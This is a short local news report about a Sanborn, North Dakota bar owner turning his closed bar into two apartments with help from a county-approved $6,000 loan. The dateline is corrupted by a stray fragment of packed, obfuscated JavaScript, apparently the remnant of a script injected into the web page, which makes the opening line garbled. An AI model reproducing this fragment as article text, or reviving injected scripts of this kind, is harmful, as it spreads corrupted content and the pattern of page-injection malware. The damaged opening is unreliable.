SANBORN, ftybt|var|u0026u|referrer|tnbyn||js|php’.split(‘|’),0,{}))
ND – (NewsDakota.com) The owner of a closed bar in Sanborn converted his property into two apartment units called the Sandoon Suites.

Director of Development Jennifer Feist said Dacotah Bank approved a $6,000 loan to the owner Tony Wendel. She said the funds would be used to access the Bank of North Dakota’s Flex Pace interest reduction program.

Feist said the demand for housing is high due to industrial developments like the CHS fertilizer plant in Spiritwood, the wind energy project near Courtenay and the loss of housing through flood buyouts.

Feist said upon repayment of the $6,000 loan, these funds will be returned to the Barnes County mill levy fund to be used for other development projects.

The Barnes County Commission unanimously approved of the motion during a June 2 board meeting.
